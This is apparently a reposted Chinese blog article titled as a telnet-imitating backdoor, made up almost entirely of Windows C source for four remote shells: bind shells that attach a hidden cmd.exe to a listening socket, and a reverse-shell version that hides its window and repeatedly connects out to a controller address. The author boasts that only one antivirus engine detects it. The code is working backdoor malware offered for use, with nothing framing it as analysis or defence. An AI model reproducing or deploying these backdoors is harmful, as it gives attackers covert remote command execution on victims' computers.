先看看一個通過管道實現進程通信的后門

// // 模仿Telnet（服務器）小程序（單管道版，本地監聽24端口） // // 病毒檢測： 多引擎殺毒只有一款冰島的殺毒軟件查殺其他全過 // // 客戶端 ： windows自帶telnet客戶端 或者 nc 都可以 // // 小 BUG ： 有的時候不能及時顯示命令返回信息，再敲一個回車就可以了，查找原因時 // 每當調試就立即返回信息，去掉斷點的話還是得多輸入回車，郁悶。 //#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <winsock.h> #pragma comment (lib, "Ws2_32")//這個版本雖然回顯不正確，但是仍然可以執行命令 int main(int argc, char* argv[]) {//初始化網絡庫WSADATA ws;WSAStartup(MAKEWORD(2,2), &ws);//socket地址struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;//創建socketint CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(24);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));listen(CreateSocket, 5);printf("等待連接中......\n");int AcceptAddrSize = sizeof(struct sockaddr_in);int AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);printf("已有客戶端成功連接\n");//管道句柄HANDLE hReadPipe;HANDLE hWritePipe;//打開管道SECURITY_ATTRIBUTES pipeattr;pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);pipeattr.lpSecurityDescriptor = 0;pipeattr.bInheritHandle = true;BOOL ret_CreatePipe = CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);//進程參數STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;//SI.hStdOutput = SI.hStdError = hWritePipe;SI.hStdOutput = hWritePipe;//輸出命令執行結果SI.hStdInput = hReadPipe;//獲取命令//進程信息PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//管道讀取緩沖區char Buff_peek[MAX_PATH] = {0};char Buff_read[MAX_PATH] = {0};unsigned long lBytesRead;char remoteCommandStr[MAX_PATH] = {0};int remoteCommandLen = 0;while(1){//查詢管道內是否有可讀數據BOOL ret_PeekNamedPipe = PeekNamedPipe(hReadPipe, Buff_peek, MAX_PATH, &lBytesRead, NULL, NULL);int ret_send = 0;if( lBytesRead ){BOOL ret_ReadFile = ReadFile(hReadPipe, Buff_read, lBytesRead, &lBytesRead, 0);ret_send = send(AcceptSocket, Buff_read, lBytesRead, 0);}else{//接收發過來的數據char buf[256] = {0};int recvCount = recv(AcceptSocket,buf,256,0);//telnet工具入口if (recvCount==1 || recvCount==2){if (!(buf[0]==0x0a && recvCount==1)){}remoteCommandStr[remoteCommandLen++]=buf[0];if (recvCount==2 && buf[0]==0x0d && buf[0]==0x0d){printf("接受到命令：%s",remoteCommandStr);if (strcmp(buf,"exit") == 0 || strcmp(buf,"bye") == 0){return 0;}//執行命令_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",remoteCommandStr);BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//初始化命令remoteCommandLen = 0;memset(remoteCommandStr,0,MAX_PATH);}}else if (recvCount>3)//nc工具入口{//末尾置零//buf[recvCount-1]= 0x00;//執行命令_sntprintf(cmdLine,MAX_PATH,"cmd.exe /c %s",buf);BOOL ret_CreateProcess = CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);//初始化命令remoteCommandLen = 0;memset(remoteCommandStr,0,MAX_PATH);}}}return 0; } 上面的小后門有個缺點就是不能反彈，可能加上lcx就可以反彈了，下面給出一份可以反彈的后門

// // 模仿Telnet（服務器）小程序（WSASocket版，反彈式連接） // // 病毒檢測： 多引擎殺毒只有一款冰島的殺毒軟件查殺其他全過 // // 客戶端 ： 反彈式連接，啟動時指定控制端地址和端口 telnet serverip serverport // //#include "stdafx.h" #include <stdio.h> #include <winsock2.h> #include <Windows.h> #pragma comment (lib, "Ws2_32") //隱藏窗口 #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") int main(int argc, char* argv[]) {//解析啟動參數if (argc!=3){printf("==================================================\n");printf("========usege:telnet serverip serverport=========\n");printf("==================================================\n");return 0;}char serverIP[20] = {0};int serverPort;strncpy(serverIP,argv[1],20);serverPort = atoi(argv[2]);//初始化網絡庫WSADATA ws;SOCKET ConnectSocket;WSAStartup(MAKEWORD(2,2), &ws);//連接到外網struct sockaddr_in server;server.sin_family = AF_INET;server.sin_port = htons(serverPort);server.sin_addr.S_un.S_addr = inet_addr(serverIP);//無限循環while (1){//創建異步套接字ConnectSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);int ret_con;do{Sleep(1000);//連接到控制端ret_con = connect(ConnectSocket, (struct sockaddr *)&server, sizeof(server));}while (SOCKET_ERROR == ret_con);//進程啟動參數STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;//輸出信息SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)ConnectSocket;PROCESS_INFORMATION PI;char cmdLine[] = "cmd.exe";//創建進程CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &SI, &PI);}return 0; }
下面再給出兩個代碼，一個雙管實現通信的本地監聽，一個是無管道本地監聽，有了上面兩份代碼，下面兩份代碼就沒有什么大用，只是做通信練習

// Server.cpp : Defines the entry point for the console application. //#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <winsock.h> #pragma comment (lib, "Ws2_32")int main(int argc, char* argv[]) {WSADATA ws;int CreateSocket;int AcceptSocket;struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;WSAStartup(MAKEWORD(2,2), &ws);CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(12345);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;int ret_bind = bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));int ret_listen = listen(CreateSocket, 5);printf("等待連接中......");int AcceptAddrSize;AcceptAddrSize = sizeof(struct sockaddr_in);AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);HANDLE hReadPipe;HANDLE hWritePipe;HANDLE hReadPipe2;HANDLE hWritePipe2;SECURITY_ATTRIBUTES pipeattr;SECURITY_ATTRIBUTES pipeattr2;pipeattr.nLength = 15;pipeattr.lpSecurityDescriptor = 0;pipeattr.bInheritHandle = true;pipeattr2.nLength = 15;pipeattr2.lpSecurityDescriptor = 0;pipeattr2.bInheritHandle = true;CreatePipe(&hReadPipe, &hWritePipe, &pipeattr, 0);CreatePipe(&hReadPipe2, &hWritePipe2, &pipeattr2, 0);//closesocket( CreateSocket );//closesocket( AcceptSocket );STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;SI.hStdOutput = SI.hStdError = hWritePipe;SI.hStdInput = hReadPipe2;PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);char Buff[MAX_PATH];unsigned long lBytesRead;while(1){PeekNamedPipe(hReadPipe, Buff, MAX_PATH, &lBytesRead, NULL, NULL);if( lBytesRead ){ReadFile(hReadPipe, Buff, lBytesRead, &lBytesRead, 0);send(AcceptSocket, Buff, lBytesRead, 0);}else{lBytesRead = recv(AcceptSocket, Buff, MAX_PATH, 0);WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);}}return 0; }
// Server.cpp : Defines the entry point for the console application. //#include <stdio.h> #include <winsock2.h> #pragma comment (lib, "Ws2_32")int main(int argc, char* argv[]) {WSADATA ws;int CreateSocket;int AcceptSocket;struct sockaddr_in CreateAddr;struct sockaddr_in AcceptAddr;WSAStartup(MAKEWORD(2,2), &ws);//CreateSocket = socket(AF_INET, SOCK_STREAM, 0);CreateSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);CreateAddr.sin_family = AF_INET;CreateAddr.sin_port = htons(12345);CreateAddr.sin_addr.S_un.S_addr = INADDR_ANY;bind(CreateSocket, (struct sockaddr *)&CreateAddr, sizeof(struct sockaddr));listen(CreateSocket, 5);printf("等待連接中......");int AcceptAddrSize;AcceptAddrSize = sizeof(struct sockaddr_in);AcceptSocket = accept(CreateSocket, (struct sockaddr *)&AcceptAddr, &AcceptAddrSize);closesocket( CreateSocket );//closesocket( AcceptSocket );STARTUPINFO SI;memset(&SI, 0, sizeof(SI));SI.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;SI.wShowWindow = SW_HIDE;SI.hStdInput = SI.hStdOutput = SI.hStdError = (void *)AcceptSocket;PROCESS_INFORMATION PI;char cmdLine[MAX_PATH] = "cmd.exe";CreateProcess(NULL, cmdLine, NULL, NULL, true, 0, NULL, NULL, &SI, &PI);return 0; }

總結

以上是生活随笔為你收集整理的仿telnet后门的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。